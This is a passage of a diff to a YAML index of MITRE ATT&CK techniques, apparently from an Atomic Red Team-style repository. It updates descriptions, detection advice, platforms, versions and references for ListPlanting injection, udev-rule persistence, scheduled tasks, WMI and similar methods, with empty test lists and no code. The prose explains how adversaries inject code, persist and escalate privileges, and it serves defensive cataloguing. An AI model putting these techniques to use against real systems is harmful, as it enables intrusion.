-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -23561,6 +23791,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -23575,21 +23808,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23634,9 +23898,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -23693,8 +23956,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -23703,7 +23966,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -23745,7 +24007,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23770,12 +24032,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23815,8 +24076,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -23824,13 +24087,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -23861,17 +24124,14 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -23934,7 +24194,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -23968,8 +24228,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -23978,6 +24238,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -23990,7 +24254,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -24093,9 +24356,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -24131,7 +24452,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24155,12 +24476,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24244,11 +24564,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24300,9 +24619,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -24351,7 +24669,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24389,30 +24707,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -24459,7 +24776,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -24491,8 +24808,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24506,6 +24823,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24518,16 +24839,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24593,7 +24917,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -24670,66 +24993,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -24742,31 +25010,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
